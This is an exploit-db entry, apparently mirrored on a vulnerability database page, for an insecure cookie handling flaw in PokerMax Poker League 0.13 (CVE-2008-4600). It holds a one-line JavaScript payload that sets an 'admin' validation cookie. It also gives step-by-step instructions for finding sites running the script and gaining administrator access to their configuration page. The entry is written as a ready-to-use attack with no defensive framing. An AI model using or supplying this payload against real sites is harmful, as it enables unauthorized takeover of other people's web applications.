Lucene search
DaRkLiFeEDB-ID:6766HistoryOct 16, 2008 - 12:00 a.m.
PokerMax Poker League 0.13 - Insecure Cookie Handling
2008-10-1600:00:00
DaRkLiFe
www.exploit-db.com
29
AI Score
7.4
Confidence
Low
**************************************************************************************
Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul
**************************************************************************************
Script :
PokerMax Poker League Insecure Cookie Handling Vulnerability
Download:
http://www.stevedawson.com/downloads/pokerleague.zip
**************************************************************************************
Exploit :
javascript:document.cookie = "ValidUserAdmin=admin";
**here "admin" refers to username of administrator on site
default username is "admin" given after installation of site
but if it is changed u can easily find out username of admin and then
substitute it in place of "admin"
**************************************************************************************
Instructions :
Find the site running on this script .
Go to http://site.com/pokerleague/pokeradmin/configure.php
It will ask for login. Now in url tab run the exploit command
Then return back to http://site.com/pokerleague/pokeradmin/configure.php
Now u should be loggedin as admin and change the thing into what you want .
**************************************************************************************
THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************
# milw0rm.com [2008-10-16]Related
cve
cve
CVE-2008-4600
2008-10-18 00:18:53
prion
prion
Authentication flaw
2008-10-18 00:18:00
cvelist
cvelist
CVE-2008-4600
2008-10-17 22:00:00
nvd
nvd
CVE-2008-4600
2008-10-18 00:18:53